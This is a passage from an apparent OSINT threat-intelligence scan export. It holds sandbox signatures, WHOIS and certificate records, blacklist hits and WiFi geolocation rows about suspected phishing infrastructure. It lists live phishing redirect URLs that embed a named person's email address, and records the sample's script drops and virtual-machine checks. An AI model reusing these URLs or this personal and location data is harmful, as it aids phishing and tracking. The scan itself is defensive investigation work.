u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsllink.tou_https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fascensia.com%2Ffelicia.xu%40ascensia.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00007008]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_2]- [targetUID: 00000000-00007008]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir7008_561964248\\Ruleset Data]- [targetUID: 00000000-00007008]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00007008]\n "Filtering Rules" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.45\\Filtering Rules]- [targetUID: 00000000-00007008]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00007008]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7008_1698674626\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007008]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7008_1698674626\\product_page.js]- [targetUID: 00000000-00007008]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7008_1698674626\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007008]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7008_1698674626\\auto_open_controller.js]- [targetUID: 00000000-00007008]\n "000009.log" has type "data"- [targetUID: N/A]\n "000013.ldb" has type "data"- [targetUID: N/A]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\7008_877128101\\Filtering Rules-AA]- [targetUID: 00000000-00007008]\n "000014.ldb" has type "data"- [targetUID: N/A]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- [targetUID: N/A]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7008_1698674626\\shoppingfre.js]- [targetUID: 00000000-00007008]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007008]\n "327850598c96cdd5_0" has type "data"- [targetUID: N/A]'}, {u'category': u'Environment Awareness', u'origin': u'File/Memory', u'identifier': u'string-253', u'name': u'Contains ability to detect presence of virtual environment (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1497', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1497', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "SetupDiGetClassDevsW" (Indicator: "SetupDiGetClassDevs"; Source: "00000000-00007008-00000C1E-47697825")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://llink.to/?u=https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fascensia.com%2Ffelicia.xu%40ascensia.com"\n Pattern match: "https://llink.to"\n Heuristic match: "1000logos.net"\n Heuristic match: "api.salesflare.com"\n Heuristic match: "fonts.gstatic.com"\n Heuristic match: "llink.to"\n Heuristic match: "stackpath.bootstrapcdn.com"\n Heuristic match: "tamannigeria.org"\n Heuristic match: "track.salesflare.com"\n Pattern match: "www.gstatic.com"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "Math.PI/180"\n Pattern match: "https://reactjs.org/docs/error-decoder.html?invariant=+e,n=1;n"\n Pattern match: "http://www.w3.org/2000/svg\\n"\n Pattern match: "https://github.com/microsoft/fast/issues/5848\\n"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://track.salesflare.com/flare.js"\n Pattern match: "https://tamannigeria.org/NUNEZ/site.php"\n Heuristic match: "tamanrigeria.org"\n Heuristic match: "u=https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fascensia.com%2Ffelicia.xu%40ascensia.com"\n Pattern match: "llink.to/?u=https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fascensia.com%2Ffelicia.xu%40ascensia.com"\n Heuristic match: "a.com"\n Heuristic match: "link.to"\n Heuristic match: "m%2Ffelicia.xu%40ascensia.com"\n Heuristic match: "0ascensia.com"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'typ | 185.199.109.153 |
| 2023-05-12 03:13:02 | Malicious Affiliate IP Address | Yes | Threat Jammer | 0 | 1 | 3 | 0 | None | Threat Jammer - Risk score: 40 (MEDIUM)
https://threatjammer.com/info/87.248.157.93 | 87.248.157.93 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.29): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:27:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.128:80 | 188.114.96.0/24 |
| 2023-05-12 02:53:35 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache_Hits": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["22DC:47A8:9574C0:E80210:645D792E"], "Content_Type": ["text/html; charset=utf-8"], "Age": ["0"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache": ["MISS"], "X_Timer": ["S1683847470.229374,VS0,VE28"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["ae50aba31a182a84ec5561a841cace6a8bdb972f"], "X_Cache_Hits": ["0"], "Via": ["1.1 varnish"], "Date": ["<REDACTED>"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-chi-klot8100109-CHI"], "Accept_Ranges": ["bytes"]} | 185.199.110.153 |
| 2023-05-12 02:53:49 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8000::/48 | 2606:50c0:8000::153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | la_vieve (Net ID: 00:06:25:7B:45:13) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:24:21 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 403 | https://ayhu.xyz/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA |
| 2023-05-12 03:09:28 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 2 | 0 | 2 | 0 | None | acilacikveteriner.com | 87.248.157.102 |
| 2023-05-12 03:35:25 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 4 | 0 | None | VOIPBL Publicly Accessible PBX List [45.131.109.0/24]
http://www.voipbl.org/update | 45.131.109.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan39 (Net ID: 00:02:6F:08:21:FC) | 37.7642, -122.3993 |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | giters (Category: coding)
https://giters.com/patrickpogoda | patrickpogoda |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-0582 (Net ID: 00:1D:D4:13:05:80) | 32.8608, -79.9746 |
| 2023-05-12 03:17:38 | Similar Domain - Whois | No | Whois | 2 | 0 | 2 | 0 | None | Domain Name: AYHA.XYZ
Registry Domain ID: D293590239-CNIC
Registrar WHOIS Server: whois.discount-domain.com
Registrar URL: http://www.onamae.com
Updated Date: 2022-04-30T16:37:38.0Z
Creation Date: 2022-04-25T16:34:12.0Z
Registry Expiry Date: 2024-04-25T23:59:59.0Z
Registrar: GMO Internet Group, Inc. d/b/a Onamae.com
Registrar IANA ID: 49
Domain Status: ok https://icann.org/epp#ok
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant State/Province: Tokyo
Registrant Country: JP
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.GM111.PARKLOGIC.COM
Name Server: NS2.GM111.PARKLOGIC.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@gmo.jp
Registrar Abuse Contact Phone: +81.337709199
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:37.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayha.xyz
Registry Domain ID: D293590239-CNIC
Registrar WHOIS Server: whois.discount-domain.com
Registrar URL: http://www.onamae.com
Updated Date: 2023-04-26T06:12:30Z
Creation Date: 2022-04-25T16:34:14Z
Registrar Registration Expiration Date: 2023-04-25T23:59:59Z
Registrar: GMO INTERNET, INC.
Registrar IANA ID: 49
Registrar Abuse Contact Email: abuse@gmo.jp
Registrar Abuse Contact Phone: +81.337709199
Domain Status: ok https://icann.org/epp#ok
Registry Registrant ID: E4D57C1767DC8C
Registrant Name: Whois Privacy Protection Service by onamae.com
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant Street: 26-1 Sakuragaoka-cho
Registrant Street: Cerulean Tower 11F
Registrant City: Shibuya-ku
Registrant State/Province: Tokyo
Registrant Postal Code: 150-8512
Registrant Country: JP
Registrant Phone: +81.354562560
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: proxy@whoisprotectservice.com
Registry Admin ID: E4D57C3C00BE9C
Admin Name: Whois Privacy Protection Service by onamae.com
Admin Organization: Whois Privacy Protection Service by onamae.com
Admin Street: 26-1 Sakuragaoka-cho
Admin Street: Cerulean Tower 11F
Admin City: Shibuya-ku
Admin State/Province: Tokyo
Admin Postal Code: 150-8512
Admin Country: JP
Admin Phone: +81.354562560
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: proxy@whoisprotectservice.com
Registry Tech ID: E4D27D6C252D99
Tech Name: Whois Privacy Protection Service by onamae.com
Tech Organization: Whois Privacy Protection Service by onamae.com
Tech Street: 26-1 Sakuragaoka-cho
Tech Street: Cerulean Tower 11F
Tech City: Shibuya-ku
Tech State/Province: Tokyo
Tech Postal Code: 150-8512
Tech Country: JP
Tech Phone: +81.354562560
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: proxy@whoisprotectservice.com
Name Server: ns1.gm111.parklogic.com
Name Server: ns2.gm111.parklogic.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-04-26T06:12:30Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | ayha.xyz |
| 2023-05-12 02:55:18 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60306, Germany, Europe | 46.101.229.70 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 008security.github.io | 185.199.111.153 |
| 2023-05-12 02:46:50 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | 34.74.170.74 |
| 2023-05-12 02:53:08 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:78:81:e1:ef:49:4b:f9:6d:c5:16:34:0e:55:ab:d5:12:44
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c5:28:ae:be:17:84:18:1b:e1:bf:c2:45:52:c1:
a5:6a:08:4a:bc:c1:e3:a4:de:5e:d0:05:9f:d6:99:
22:94:16:f7:d2:69:68:71:09:4a:62:e7:41:0d:0a:
be:3e:3b:51:6d:0b:4a:0f:76:3a:b0:8e:cb:56:a6:
21:8f:de:9f:c1:45:ea:d1:38:90:03:24:5c:77:6f:
cd:06:86:05:00:ae:fc:49:fe:8f:e8:85:de:e7:e4:
d0:99:c5:ad:e4:c5:9c:9a:95:9e:97:20:79:ed:7e:
c1:65:47:a7:ce:2c:b4:2b:9e:4c:1f:8e:21:8f:4e:
cf:f7:3e:4f:ff:b2:88:aa:90:dd:b7:be:8a:db:d2:
17:66:cc:6f:09:3d:67:e8:3c:91:39:a6:90:69:62:
e9:f2:9c:b4:d3:ba:96:0b:b2:0e:b2:74:eb:8a:64:
f6:d7:18:6c:22:f7:1e:bc:17:2f:20:0c:dc:30:1b:
5e:7d:a8:0b:34:ce:8a:75:55:4f:72:8b:d6:d7:dc:
63:55:19:dd:2a:a0:25:0a:50:bd:17:df:74:d9:8e:
df:7b:ba:19:b8:f5:47:fd:97:bf:18:2b:99:ec:f3:
58:72:eb:64:34:43:28:b7:d3:7f:de:05:80:58:fb:
f6:05:86:02:1c:8d:eb:d5:23:a1:08:9a:01:84:aa:
05:5a:57:5b:4f:80:96:8a:65:18:8f:fb:bb:dd:91:
f1:8e:b1:05:2f:76:93:8f:28:86:73:78:5c:d4:fe:
b8:81:83:79:71:79:e9:31:46:fb:22:a9:30:c3:0b:
03:79:d0:e6:24:cf:e4:e0:cb:3e:91:71:20:ec:40:
44:0f:22:88:b4:5a:5f:cd:f2:41:b7:a9:21:3e:74:
54:3b:a0:07:32:4e:5c:e7:71:a3:33:95:bd:ee:27:
4a:b2:53:d1:06:de:2c:39:7b:83:7f:1c:cf:0a:28:
32:ef:07:d4:d3:ef:a5:9d:8a:8a:36:97:d5:6f:97:
57:8e:aa:22:4e:6c:70:6c:aa:43:59:1c:d0:88:a6:
26:22:1b:20:62:45:6e:6e:62:40:f6:bf:20:b1:b8:
43:17:25:80:1d:c9:c1:63:ed:d3:a8:bc:4b:68:5d:
f2:19:96:37:4a:82:70:a9:86:22:f6:56:84:02:f9:
b4:a7:6c:3d:03:4c:59:fe:71:81:0a:71:7e:9e:7c:
1a:5d:b6:ce:77:db:f9:80:a5:2d:65:a3:96:1f:c9:
ca:a0:c7:b0:9d:21:28:db:1c:6a:4c:c7:37:20:39:
9f:b7:63:e2:80:c5:2d:53:fd:3e:c8:1a:cf:e7:76:
9f:bc:92:4a:58:81:84:d1:30:a4:4e:12:c7:e5:10:
eb:dc:59
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
75:02:8B:49:76:96:40:2E:6F:D7:49:80:B9:AF:AD:08:D3:5D:F2:26
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
29:76:7a:56:81:b0:95:01:3f:0a:9d:7d:c4:e5:17:5f:14:64:
31:1f:ff:e8:89:b7:73:d0:e5:48:95:94:90:79:71:5f:5e:bd:
11:57:2e:35:46:0a:d0:46:0d:68:f1:c5:7a:ea:d2:5c:76:4c:
32:7a:df:e5:15:1f:4c:85:80:9e:03:4d:56:80:ad:4b:2c:6b:
b1:00:96:20:ff:02:5c:fe:b3:6b:a4:df:10:d7:1a:34:e6:05:
8a:93:ce:43:93:43:f0:21:83:34:dd:3b:5d:cd:02:a2:f7:69:
01:e6:a2:9d:c4:0a:00:06:c9:25:8d:66:34:7e:e7:56:fc:96:
0c:11:f2:15:8e:1b:ee:a8:bc:70:25:91:eb:fa:be:46:78:f9:
43:e5:48:f9:88:3a:38:53:b4:c2:e1:83:7c:30:6a:d7:b6:1a:
08:51:7a:03:5c:ed:3d:25:45:1e:03:b4:ab:40:92:83:1a:fd:
41:7d:5f:d2:40:54:63:0d:0f:36:db:fd:2f:13:eb:5b:2e:6b:
08:c3:7d:13:ce:a1:6a:1d:ba:e8:54:c7:19:87:ff:c8:d8:2e:
77:d7:9f:17:34:29:b1:63:1a:a3:70:9f:2d:0d:32:ff:45:66:
9c:81:e8:0c:a2:cc:74:6a:75:0f:61:f4:74:74:89:88:86:e3:
ba:d0:68:2d
| battleb0t.xyz |
| 2023-05-12 03:23:31 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.11:8080 | 188.114.96.0/24 |
| 2023-05-12 03:00:50 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.72): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.115 | 35.229.48.116 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.175): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | 3dtoday (Category: hobby)
https://3dtoday.ru/blogs/login | login |
| 2023-05-12 02:55:18 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | linux | 46.101.229.70 |
| 2023-05-12 03:03:16 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.168.252 | panel.battleb0t.xyz |
| 2023-05-12 03:31:58 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.0:80 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Newgrounds (Category: gaming)
https://login.newgrounds.com/ | login |
| 2023-05-12 03:12:58 | Malicious Affiliate | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [frabjous-lebkuchen-324004.netlify.app]
https://www.openphish.com/feed.txt | frabjous-lebkuchen-324004.netlify.app |
| 2023-05-12 02:46:42 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | United States, South Carolina, North Charleston | 35.229.48.116 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | GitHub\, Inc. | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io |
| 2023-05-12 03:09:26 | Co-Hosted Site - Domain Whois | No | Whois | 1 | 0 | 4 | 0 | None | % Hello, this is the DOMREG whois service.
%
% By submitting a query you agree not to use the information made
% available to:
% - allow, enable or otherwise support the transmission of unsolicited,
% commercial advertising or other solicitations whether via email or
% otherwise;
% - target advertising in any possible way;
% - to cause nuisance in any possible way to the registrants by sending
% (whether by automated, electronic processes capable of enabling
% high volumes or other possible means) messages to them.
%
% Version 0.4
%
% For more information please visit https://whois.lt
%
Domain: 000.lt
Status: registered
Registered: 2022-10-11
Expires: 2023-10-12
%
Registrar: Telia Lietuva, AB
Registrar website: http://www.hostex.lt
Registrar email: domains@hostex.lt
%
Contact organization: Telia Lietuva, AB
Contact email: domains@hostex.lt
%
Nameserver: ns3.hostex.lt
Nameserver: ns4.hostex.lt
Nameserver: ns1.hostex.lt
Nameserver: ns2.hostex.lt
| 000.lt |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | au.ru (Category: misc)
https://au.ru/user/login/ | login |
| 2023-05-12 02:56:38 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'104.196.30.220', u'172.67.128.152'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://regclickonetwoget.com/?qs=SVI3JJKW8KWM1XICHGSM-41fb87317e87a7486e', u'signatures': [{u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"MaxConnectionsPerServer" (Indicator: "MaxConnectionsPerServer") in Source: 00000000-00002536-00000BCA-24571201\n "MaxConnectionsPer1_0Server" (Indicator: "MaxConnectionsPer1_0Server") in Source: 00000000-00002536-00000BCA-24572342'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3360 -s 132" (UID: 00000000-00003436)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"e1.o.lencr.org"\n "facesupdates.com"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00003436) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFF57.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9e8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "DBWinMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_9e8_IESQMMUTEX_0_303"\n "IsoScope_9e8_IESQMMUTEX_0_519"\n "IsoScope_9e8_IE_EarlyTabStart_0xd54_Mutex"\n "IsoScope_9e8_IESQMMUTEX_0_331"\n "IsoScope_9e8_ConnHashTable<2536>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2536"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "172.67.128.152:443"\n "23.32.45.191:80"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3360 -s 132" (UID: 00000000-00003436)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet 